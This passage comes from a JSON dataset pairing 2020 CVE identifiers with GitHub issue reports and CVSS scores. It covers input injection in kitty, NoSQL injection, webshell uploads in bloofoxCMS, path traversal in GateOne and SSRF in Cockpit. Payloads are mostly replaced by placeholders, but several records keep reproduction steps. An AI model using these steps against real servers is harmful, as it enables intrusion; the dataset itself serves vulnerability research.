  59886. "description": "Input injection via graphic protocol. Describe the bug When attempting to load an image file, the graphic protocol can reply with a message containing the faulty image filename in a decoded form (i.e. not base NUMBERTAG thus allowing for arbitrary input to be inserted. To Reproduce Here is a simple example showing how an attacker could craft a FILETAG file that would cause the execution of arbitrary commands when displayed using cat on kitty. ERRORTAG In Kitty, run APITAG from the shell prompt to perform the input injection ERRORTAG Remark: The other failed commands are caused by the rest of the escape reply. The input sequence ESC+underscore is typically interpreted by readline as the command yank last arg thus causing the last argument of the last command (in that case, that is APITAG to be inserted.",
  59887. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59888. "severity": "CRITICAL",
  59889. "baseScore": 9.8,
  59890. "impactScore": 5.9,
  59891. "exploitabilityScore": 3.9
  59892. },
  59893. {
  59894. "CVE_ID": "CVE-2020-35666",
  59895. "Issue_Url_old": "https://github.com/steedos/steedos-platform/issues/1245",
  59896. "Issue_Url_new": "https://github.com/steedos/steedos-platform/issues/1245",
  59897. "Repo_new": "steedos/steedos-platform",
  59898. "Issue_Created_At": "2020-12-22T02:37:45Z",
  59899. "description": "Mongodb APITAG \u6ce8\u5165\u95ee\u9898. \u63a5\u53e3\u5bf9mongodb nosql\u64cd\u4f5c\u9a8c\u8bc1\u4e0d\u4e25\uff0c\u53ef\u80fd\u5bfc\u81f4nosql\u6ce8\u5165\u3002\u8be6\u7ec6\u53ef\u53c2\u8003 FILETAG \u5927\u591a\u6570\u63a5\u53e3\u5b58\u5728\u9274\u6743\u6240\u4ee5\u672a\u767b\u5f55\u65e0\u6cd5\u5229\u7528\uff0c\u8fd9\u91cc\u4ec5\u4ec5\u4e3e\u4e00\u4e2a\u4f8b\u5b50 \u6f0f\u6d1e\u4ea7\u751f\u539f\u56e0 \u4f8b\u5982\u5728 PATHTAG \u4e2d\uff0c\u5b58\u5728\u5982\u4e0b\u4ee3\u7801\uff1a ERRORTAG APITAG APITAG operator URLTAG \u6784\u9020 X User Id[$ne NUMBERTAG user: {\"$ne NUMBERTAG space_user NUMBERTAG URLTAG \u8fdb\u884cdocker NUMBERTAG CODETAG \u5efa\u8bae\uff1a\u5e94\u8be5\u5728nosql\u64cd\u4f5c\u524d\u9a8c\u8bc1\u53c2\u6570\u7c7b\u578b",
  59900. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59901. "severity": "HIGH",
  59902. "baseScore": 8.8,
  59903. "impactScore": 5.9,
  59904. "exploitabilityScore": 2.8
  59905. },
  59906. {
  59907. "CVE_ID": "CVE-2020-35668",
  59908. "Issue_Url_old": "https://github.com/RedisGraph/RedisGraph/issues/1502",
  59909. "Issue_Url_new": "https://github.com/redisgraph/redisgraph/issues/1502",
  59910. "Repo_new": "redisgraph/redisgraph",
  59911. "Issue_Created_At": "2020-12-21T14:41:21Z",
  59912. "description": "APITAG APITAG Of Service) Bug. Bug impact Redis Graph crashes and server downs Bug explained It's appear that Redis Graph doesn't processes well list of unknown data types. Typing this in the CLI, server crashes: APITAG It also crashes with any invalid values in A . Redis Bug report === REDIS BUG REPORT START: Cut & paste starting from here NUMBERTAG M NUMBERTAG Dec NUMBERTAG Redis NUMBERTAG crashed by signal NUMBERTAG M NUMBERTAG Dec NUMBERTAG Crashed running the instruction at NUMBERTAG f NUMBERTAG a6e NUMBERTAG M NUMBERTAG Dec NUMBERTAG Accessing address NUMBERTAG M NUMBERTAG Dec NUMBERTAG Failed assertion: <no assertion failed> (<no file NUMBERTAG STACK TRACE EIP: PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG a6e NUMBERTAG Backtrace: redis server APITAG redis server APITAG PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG a6e NUMBERTAG PATHTAG APITAG PATHTAG NUMBERTAG b7c7e NUMBERTAG f NUMBERTAG a6e3c7e] PATHTAG APITAG PATHTAG NUMBERTAG b7c7e NUMBERTAG f NUMBERTAG a6e3c7e] PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG NUMBERTAG fb5ad NUMBERTAG f NUMBERTAG a NUMBERTAG ad] PATHTAG NUMBERTAG fa NUMBERTAG f NUMBERTAG b NUMBERTAG fa3] PATHTAG (clone NUMBERTAG f NUMBERTAG f NUMBERTAG b7b NUMBERTAG cf] INFO OUTPUT Server redis_version NUMBERTAG redis_git_sha NUMBERTAG redis_git_dirty NUMBERTAG APITAG redis_mode:standalone APITAG NUMBERTAG linuxkit NUMBERTAG arch_bits NUMBERTAG multiplexing_api:epoll atomicvar_api:atomic builtin gcc_version NUMBERTAG process_id NUMBERTAG APITAG tcp_port NUMBERTAG uptime_in_seconds NUMBERTAG uptime_in_days NUMBERTAG hz NUMBERTAG configured_hz NUMBERTAG lru_clock NUMBERTAG PATHTAG config_file: Clients connected_clients NUMBERTAG APITAG APITAG blocked_clients NUMBERTAG tracking_clients NUMBERTAG clients_in_timeout_table NUMBERTAG Memory used_memory NUMBERTAG used_memory_human NUMBERTAG M used_memory_rss NUMBERTAG used_memory_rss_human NUMBERTAG M used_memory_peak NUMBERTAG used_memory_peak_human NUMBERTAG M used_memory_peak_perc NUMBERTAG used_memory_overhead NUMBERTAG used_memory_startup NUMBERTAG used_memory_dataset NUMBERTAG APITAG allocator_allocated NUMBERTAG allocator_active NUMBERTAG allocator_resident NUMBERTAG APITAG APITAG used_memory_lua NUMBERTAG used_memory_lua_human NUMBERTAG K used_memory_scripts NUMBERTAG used_memory_scripts_human NUMBERTAG B number_of_cached_scripts NUMBERTAG maxmemory NUMBERTAG maxmemory_human NUMBERTAG B maxmemory_policy:noeviction allocator_frag_ratio NUMBERTAG allocator_frag_bytes NUMBERTAG allocator_rss_ratio NUMBERTAG allocator_rss_bytes NUMBERTAG rss_overhead_ratio NUMBERTAG rss_overhead_bytes NUMBERTAG mem_fragmentation_ratio NUMBERTAG APITAG mem_not_counted_for_evict NUMBERTAG mem_replication_backlog NUMBERTAG mem_clients_slaves NUMBERTAG mem_clients_normal NUMBERTAG mem_aof_buffer NUMBERTAG mem_allocator:jemalloc NUMBERTAG active_defrag_running NUMBERTAG lazyfree_pending_objects NUMBERTAG Persistence loading NUMBERTAG rdb_changes_since_last_save NUMBERTAG rdb_bgsave_in_progress NUMBERTAG rdb_last_save_time NUMBERTAG rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec NUMBERTAG rdb_current_bgsave_time_sec NUMBERTAG rdb_last_cow_size NUMBERTAG aof_enabled NUMBERTAG aof_rewrite_in_progress NUMBERTAG aof_rewrite_scheduled NUMBERTAG aof_last_rewrite_time_sec NUMBERTAG aof_current_rewrite_time_sec NUMBERTAG aof_last_bgrewrite_status:ok aof_last_write_status:ok aof_last_cow_size NUMBERTAG module_fork_in_progress NUMBERTAG module_fork_last_cow_size NUMBERTAG Stats total_connections_received NUMBERTAG total_commands_processed NUMBERTAG instantaneous_ops_per_sec NUMBERTAG total_net_input_bytes NUMBERTAG total_net_output_bytes NUMBERTAG APITAG APITAG rejected_connections NUMBERTAG sync_full NUMBERTAG sync_partial_ok NUMBERTAG sync_partial_err NUMBERTAG expired_keys NUMBERTAG expired_stale_perc NUMBERTAG APITAG APITAG evicted_keys NUMBERTAG keyspace_hits NUMBERTAG keyspace_misses NUMBERTAG pubsub_channels NUMBERTAG pubsub_patterns NUMBERTAG latest_fork_usec NUMBERTAG migrate_cached_sockets NUMBERTAG slave_expires_tracked_keys NUMBERTAG active_defrag_hits NUMBERTAG active_defrag_misses NUMBERTAG active_defrag_key_hits NUMBERTAG active_defrag_key_misses NUMBERTAG tracking_total_keys NUMBERTAG tracking_total_items NUMBERTAG tracking_total_prefixes NUMBERTAG unexpected_error_replies NUMBERTAG Replication role:master connected_slaves NUMBERTAG APITAG APITAG master_repl_offset NUMBERTAG second_repl_offset NUMBERTAG repl_backlog_active NUMBERTAG repl_backlog_size NUMBERTAG APITAG repl_backlog_histlen NUMBERTAG CPU APITAG APITAG APITAG APITAG Modules APITAG Commandstats APITAG Cluster cluster_enabled NUMBERTAG Keyspace APITAG CLIENT LIST OUTPUT id NUMBERTAG APITAG fd NUMBERTAG name= age NUMBERTAG idle NUMBERTAG flags=b db NUMBERTAG sub NUMBERTAG psub NUMBERTAG multi NUMBERTAG qbuf NUMBERTAG qbuf free NUMBERTAG obl NUMBERTAG oll NUMBERTAG omem NUMBERTAG events=r APITAG user=default REGISTERS NUMBERTAG M NUMBERTAG Dec NUMBERTAG RA NUMBERTAG RB NUMBERTAG f NUMBERTAG f NUMBERTAG RC NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG RD NUMBERTAG f NUMBERTAG ab0 RDI NUMBERTAG a0 RSI NUMBERTAG RBP NUMBERTAG RSP NUMBERTAG f NUMBERTAG f0 R NUMBERTAG R NUMBERTAG f R NUMBERTAG R NUMBERTAG f NUMBERTAG f NUMBERTAG R NUMBERTAG R NUMBERTAG f NUMBERTAG b NUMBERTAG d9f8 R NUMBERTAG R NUMBERTAG RIP NUMBERTAG f NUMBERTAG a6e NUMBERTAG EFL NUMBERTAG CSGSFS NUMBERTAG b NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG ab NUMBERTAG e NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fe NUMBERTAG f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fd NUMBERTAG f NUMBERTAG a6e3c7e NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fc NUMBERTAG f NUMBERTAG f1c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fb NUMBERTAG f NUMBERTAG a6e NUMBERTAG c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fa NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG d9f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f1c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG adb3ba NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f1c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG e NUMBERTAG c6f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG ab NUMBERTAG e NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG MODULES INFO OUTPUT graph_executing commands FAST MEMORY TEST NUMBERTAG M NUMBERTAG Dec NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG Dec NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG Dec NUMBERTAG Bio thread for job type NUMBERTAG terminated Preparing to test memory region NUMBERTAG e NUMBERTAG eae NUMBERTAG bytes) Preparing to test memory region NUMBERTAG e NUMBERTAG bf NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG aa NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d2a NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d2c NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG adfd NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG ae NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b6b NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b NUMBERTAG c NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bb NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bdad NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bdda NUMBERTAG bytes) .O.O.O.O.O.O.O.O.%",
  59913. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59914. "severity": "HIGH",
  59915. "baseScore": 7.5,
  59916. "impactScore": 3.6,
  59917. "exploitabilityScore": 3.9
  59918. },
  59919. {
  59920. "CVE_ID": "CVE-2020-35700",
  59921. "Issue_Url_old": "https://github.com/librenms/librenms/issues/12405",
  59922. "Issue_Url_new": "https://github.com/librenms/librenms/issues/12405",
  59923. "Repo_new": "librenms/librenms",
  59924. "Issue_Created_At": "2020-12-22T14:03:39Z",
  59925. "description": "security issue. Hi, can I please get a point of contact to report a security issue? The email address EMAILTAG rg is bouncing. Thanks!",
  59926. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59927. "severity": "HIGH",
  59928. "baseScore": 8.8,
  59929. "impactScore": 5.9,
  59930. "exploitabilityScore": 2.8
  59931. },
  59932. {
  59933. "CVE_ID": "CVE-2020-35701",
  59934. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/4022",
  59935. "Issue_Url_new": "https://github.com/cacti/cacti/issues/4022",
  59936. "Repo_new": "cacti/cacti",
  59937. "Issue_Created_At": "2020-12-24T15:37:03Z",
  59938. "description": "SQL Injection in FILETAG . Describe the bug Due to a lack of validation, FILETAG can be the source of a SQL injection. Expected behavior Cacti should be safe from SQL injections",
  59939. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59940. "severity": "HIGH",
  59941. "baseScore": 8.8,
  59942. "impactScore": 5.9,
  59943. "exploitabilityScore": 2.8
  59944. },
  59945. {
  59946. "CVE_ID": "CVE-2020-35709",
  59947. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/7",
  59948. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/7",
  59949. "Repo_new": "alexlang24/bloofoxcms",
  59950. "Issue_Created_At": "2020-12-25T13:27:07Z",
  59951. "description": "An arbitrary file upload vulnerability was found. I want to report an arbitrary file upload vulnerability that I found in bloofoxcms NUMBERTAG through which we can upload webshell and control the web server. After entering the web management background, we can use the upload function to upload files\uff1a FILETAG We create a new webshell file and name it FILETAG \uff1a APITAG Click to select this APITAG : FILETAG Click upload file(s) and grab the data package: FILETAG First request package: ERRORTAG First response package \uff1a CODETAG Then we follow NUMBERTAG redirection\uff0c Second request package \uff1a CODETAG Second response package \uff1a ERRORTAG We can see that the file has been successfully uploaded to PATHTAG FILETAG Finally, we can access the webshell address and execute any command\uff1a FILETAG",
  59952. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  59953. "severity": "MEDIUM",
  59954. "baseScore": 4.9,
  59955. "impactScore": 3.6,
  59956. "exploitabilityScore": 1.2
  59957. },
  59958. {
  59959. "CVE_ID": "CVE-2020-35711",
  59960. "Issue_Url_old": "https://github.com/vorner/arc-swap/issues/45",
  59961. "Issue_Url_new": "https://github.com/vorner/arc-swap/issues/45",
  59962. "Repo_new": "vorner/arc-swap",
  59963. "Issue_Created_At": "2020-12-10T03:13:06Z",
  59964. "description": "APITAG dereferences to a dangling pointer. Hello fellow Rustacean, we APITAG group APITAG gatech) are scanning Rust code on crates.io for potential memory safety and soundness bugs and found an issue in this crate which allows safe Rust code to exhibit an undefined behavior. Issue Description URLTAG URLTAG As noted in the comment, unsafe code in APITAG expects the underlying guard type to dereferences to the same value even when the guard object is moved. However, Map uses Access as a trait bound which does not guarantee this property. As a result, Map accesses a dangling pointer when it is used with an Access implementation that does not dereferences to the same value when moved. URLTAG Constant seems to be the only type in this crate that implements Access in this way, but there can be other user types that implements Access on their own. Reproduction Below is an example program that segfaults, written only with safe APIs of APITAG . APITAG Detail APITAG APITAG ERRORTAG Output: CODETAG Tested Environment Crate: arc swap Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG APITAG APITAG",
  59965. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59966. "severity": "HIGH",
  59967. "baseScore": 7.5,
  59968. "impactScore": 3.6,
  59969. "exploitabilityScore": 3.9
  59970. },
  59971. {
  59972. "CVE_ID": "CVE-2020-35734",
  59973. "Issue_Url_old": "https://github.com/sruupl/batflat/issues/98",
  59974. "Issue_Url_new": "https://github.com/sruupl/batflat/issues/98",
  59975. "Repo_new": "sruupl/batflat",
  59976. "Issue_Created_At": "2021-01-20T13:41:48Z",
  59977. "description": "Code injection vulnerability in Batflat NUMBERTAG Users tab. Users tab attributes aren't sanitized and some of them allow for code injection. This means that an authenticated user with access to Users tab can execute arbitrary code on the web server with application privileges. Adding user with PHP code in APITAG name\" field: FILETAG PHP being executed: FILETAG",
  59978. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  59979. "severity": "HIGH",
  59980. "baseScore": 7.2,
  59981. "impactScore": 5.9,
  59982. "exploitabilityScore": 1.2
  59983. },
  59984. {
  59985. "CVE_ID": "CVE-2020-35736",
  59986. "Issue_Url_old": "https://github.com/liftoff/GateOne/issues/747",
  59987. "Issue_Url_new": "https://github.com/liftoff/gateone/issues/747",
  59988. "Repo_new": "liftoff/gateone",
  59989. "Issue_Created_At": "2020-12-27T09:05:04Z",
  59990. "description": "An Arbitrary File Download Vulnerability. Gateone has a vulnerability that allows arbitrary file download without authentication, which can traverse the directory and read arbitrary files on the target system. > Code auditing View the file FILETAG In line NUMBERTAG you can find the place to set the handlers, FILETAG You can see that _downloads/_ did not use the APITAG that comes with Tornado, but the method written by the author himself, which may have vulnerabilities. You can find the definition of the get method on line NUMBERTAG ERRORTAG Pay attention to the key part. You can see that the path is spelled into filepath without any filtering. There is directory traversal, and any file can be read. FILETAG > Recurrence of vulnerability Use the official docker image to build the test environment NUMBERTAG Pull image APITAG NUMBERTAG Run image ERRORTAG After installation, visit URLTAG Just ignore it if the browser may report that it is not safe. FILETAG Packet capture in the process of browsing, and you can successfully read the file PATHTAG by visiting URLTAG . FILETAG",
  59991. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  59992. "severity": "HIGH",
  59993. "baseScore": 7.5,
  59994. "impactScore": 3.6,
  59995. "exploitabilityScore": 3.9
  59996. },
  59997. {
  59998. "CVE_ID": "CVE-2020-35738",
  59999. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/91",
  60000. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/91",
  60001. "Repo_new": "dbry/wavpack",
  60002. "Issue_Created_At": "2020-12-27T18:52:53Z",
  60003. "description": "APITAG crashes with SEGFAULT. Hello! This bug was found by Crusher (fuzzer developing in ISP RAS), thanks to following colleagues: Akolzin Vitalii, Shamil Kurmangaleev, Maxim Mishechkin, Fedor Nis'kov, Ivan Gulakov, Denis Straghkov, Andrey Fedotov, Alexey Vishnyakov, Daniil Kutz, Alexander Novikov. Product version Commit APITAG (latest commit on master at current moment). Environment Ubuntu NUMBERTAG To reproduce NUMBERTAG Extract APITAG from FILETAG Run: APITAG Program crashes with SEGFAULT. Error message: CODETAG Valgrind output: ERRORTAG Analysis NUMBERTAG In URLTAG malloc 's argument overflows APITAG type and results in small positive number. So, only a short memory region is allocated NUMBERTAG Then URLTAG dptr now points to address in previously allocated region NUMBERTAG Finally URLTAG we write in memory by dptr pointer. But in one moment dptr points to memory outside of allocated region. Segmentation fault.",
  60004. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H",
  60005. "severity": "MEDIUM",
  60006. "baseScore": 6.1,
  60007. "impactScore": 4.2,
  60008. "exploitabilityScore": 1.8
  60009. },
  60010. {
  60011. "CVE_ID": "CVE-2020-35759",
  60012. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/10",
  60013. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/10",
  60014. "Repo_new": "alexlang24/bloofoxcms",
  60015. "Issue_Created_At": "2020-12-27T11:02:09Z",
  60016. "description": "CSRF Attack that leads to edit any file content APITAG I discovered a CSRF Vulnerability in APITAG , the request validation was not there to avoid CSRF Attacks. APITAG : ERRORTAG Impact Change any file content in webserver APITAG Fix Synchronizer Token Pattern URLTAG",
  60017. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  60018. "severity": "MEDIUM",
  60019. "baseScore": 6.5,
  60020. "impactScore": 3.6,
  60021. "exploitabilityScore": 2.8
  60022. },
  60023. {
  60024. "CVE_ID": "CVE-2020-35760",
  60025. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/9",
  60026. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/9",
  60027. "Repo_new": "alexlang24/bloofoxcms",
  60028. "Issue_Created_At": "2020-12-27T10:31:18Z",
  60029. "description": "Authenticated Unrestricted File Upload in 'profile' action. I found Unrestricted File Upload in APITAG > filename param, the filename param only checks the MIME type which that can be bypassed. APITAG : CODETAG Impact Upload Backdoor PHP Files that leads to control the victim webserver",
  60030. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60031. "severity": "CRITICAL",
  60032. "baseScore": 9.8,
  60033. "impactScore": 5.9,
  60034. "exploitabilityScore": 3.9
  60035. },
  60036. {
  60037. "CVE_ID": "CVE-2020-35761",
  60038. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/8",
  60039. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/8",
  60040. "Repo_new": "alexlang24/bloofoxcms",
  60041. "Issue_Created_At": "2020-12-27T09:44:47Z",
  60042. "description": "Authenticated RXSS in 'fileurl' parameter. I found an Authenticated RXSS in 'fileurl' parameter, the 'fileurl' input was not safely sanitized. APITAG : FILETAG URLTAG APITAG Impact The attacker can execute a HTML/JS Code (the attacker can stealing cookies,etc..) Fix Use FILETAG function",
  60043. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60044. "severity": "MEDIUM",
  60045. "baseScore": 5.4,
  60046. "impactScore": 2.7,
  60047. "exploitabilityScore": 2.3
  60048. },
  60049. {
  60050. "CVE_ID": "CVE-2020-35762",
  60051. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/11",
  60052. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/11",
  60053. "Repo_new": "alexlang24/bloofoxcms",
  60054. "Issue_Created_At": "2020-12-27T11:15:54Z",
  60055. "description": "Authenticated Path traversal in 'fileurl' parameter that leads to read local files. I discovered a Path traversal Vulnerability in 'fileurl' parameter, the 'fileurl' input does not avoid (./\\) in user input which that leads to Path traversal Vulnerability. APITAG : FILETAG FILETAG Impact Read local files in webserver",
  60056. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
  60057. "severity": "LOW",
  60058. "baseScore": 2.7,
  60059. "impactScore": 1.4,
  60060. "exploitabilityScore": 1.2
  60061. },
  60062. {
  60063. "CVE_ID": "CVE-2020-35766",
  60064. "Issue_Url_old": "https://github.com/trusteddomainproject/OpenDKIM/issues/113",
  60065. "Issue_Url_new": "https://github.com/trusteddomainproject/opendkim/issues/113",
  60066. "Repo_new": "trusteddomainproject/opendkim",
  60067. "Issue_Created_At": "2020-12-28T16:05:55Z",
  60068. "description": "Insecure temporary key path /tmp/testkeys. In URLTAG a fixed path under APITAG is used for the test keys. This is not a _huge_ vulnerability, but it is a silly one since it is so well known and easy to avoid: URLTAG Either a random name should be chosen securely, or perhaps the temporary keys should be created within the build directory.",
  60069. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60070. "severity": "HIGH",
  60071. "baseScore": 7.8,
  60072. "impactScore": 5.9,
  60073. "exploitabilityScore": 1.8
  60074. },
  60075. {
  60076. "CVE_ID": "CVE-2020-35850",
  60077. "Issue_Url_old": "https://github.com/cockpit-project/cockpit/issues/15077",
  60078. "Issue_Url_new": "https://github.com/cockpit-project/cockpit/issues/15077",
  60079. "Repo_new": "cockpit-project/cockpit",
  60080. "Issue_Created_At": "2020-12-28T16:28:11Z",
  60081. "description": "unauthenticated server side request forgery . Cockpit version NUMBERTAG OS: Ubuntu NUMBERTAG Page: login User can detect open ssh port or another open ports on server that services Cockpit last version. This is a vulnerability that allows an user send request to internal hosts for detecting open ports. So that firewall configuration can be bypassed or the server can be used like gateway by malicious user. In addition, user induces the application to make an request back to the server that is hosting Cockpit. For example: if system admin creates iptables rule to drop all packets that come to NUMBERTAG port or another port, user can detect whether port NUMBERTAG is open or not. Assuming that there is a iptables rule which port NUMBERTAG is open for APITAG (loopback interface) but is closed for other interfaces CODETAG CODETAG Steps to reproduce: On login panel NUMBERTAG Click Other Options NUMBERTAG Set APITAG to Connect to field and send request with incorrect credentials NUMBERTAG Intercept the request with Burp Suite NUMBERTAG If ssh service is open on port NUMBERTAG and credentials are wrong, server returns NUMBERTAG Authentication Failed\" response NUMBERTAG If user tries connect to a port that accepts data for ssh connection , server returns NUMBERTAG Authentication failed: no host\" response and waits NUMBERTAG seconds NUMBERTAG If user tries connect to a closed port , server returns NUMBERTAG Authentication failed: no host\" response and without waiting NUMBERTAG If ssh service is open on port NUMBERTAG and credentials are correct, server returns NUMBERTAG response: FILETAG FILETAG FILETAG",
  60082. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  60083. "severity": "MEDIUM",
  60084. "baseScore": 6.5,
  60085. "impactScore": 3.6,
  60086. "exploitabilityScore": 2.8
  60087. },
  60088. {
  60089. "CVE_ID": "CVE-2020-35918",
  60090. "Issue_Url_old": "https://github.com/tuupola/branca-spec/issues/22",
  60091. "Issue_Url_new": "https://github.com/tuupola/branca-spec/issues/22",
  60092. "Repo_new": "tuupola/branca-spec",
  60093. "Issue_Created_At": "2020-04-06T21:18:10Z",
  60094. "description": "Base NUMBERTAG is actually Base NUMBERTAG The character set provided in the spec: APITAG Only contains NUMBERTAG characters, and is thus a base NUMBERTAG encoding. Looking at the implementations listed on the document, it seems that most of them (if not all) include a z to the character set as I would expect. Is this the intended behaviour? Or should the character set not include the character z ?",
  60095. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  60096. "severity": "MEDIUM",
  60097. "baseScore": 5.5,
  60098. "impactScore": 3.6,
  60099. "exploitabilityScore": 1.8
  60100. },
  60101. {
  60102. "CVE_ID": "CVE-2020-35918",
  60103. "Issue_Url_old": "https://github.com/return/branca/issues/24",
  60104. "Issue_Url_new": "https://github.com/return/branca/issues/24",
  60105. "Repo_new": "return/branca",
  60106. "Issue_Created_At": "2020-11-29T14:04:47Z",
  60107. "description": "Security issue: Panic on invalid base NUMBERTAG encoded tokens. Documentation for APITAG , which also implicitly covers APITAG , states that: > If the input is not in Base NUMBERTAG format, it returns a ERRORTAG Result. Prior to APITAG this was not the case, instead a panic would occur: URLTAG This could leave any validating instance vulnerable to potential APITAG when parsing untrusted data and unexpected panics could occur. This behavior was corrected in URLTAG URLTAG",
  60108. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  60109. "severity": "MEDIUM",
  60110. "baseScore": 5.5,
  60111. "impactScore": 3.6,
  60112. "exploitabilityScore": 1.8
  60113. },
  60114. {
  60115. "CVE_ID": "CVE-2020-35930",
  60116. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/201",
  60117. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/201",
  60118. "Repo_new": "seopanel/seo-panel",
  60119. "Issue_Created_At": "2020-12-30T10:49:42Z",
  60120. "description": "FILETAG After fix i go to request CVE",
  60121. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60122. "severity": "MEDIUM",
  60123. "baseScore": 5.4,
  60124. "impactScore": 2.7,
  60125. "exploitabilityScore": 2.3
  60126. },
  60127. {
  60128. "CVE_ID": "CVE-2020-35970",
  60129. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/53",
  60130. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/53",
  60131. "Repo_new": "yzmcms/yzmcms",
  60132. "Issue_Created_At": "2020-12-14T15:14:20Z",
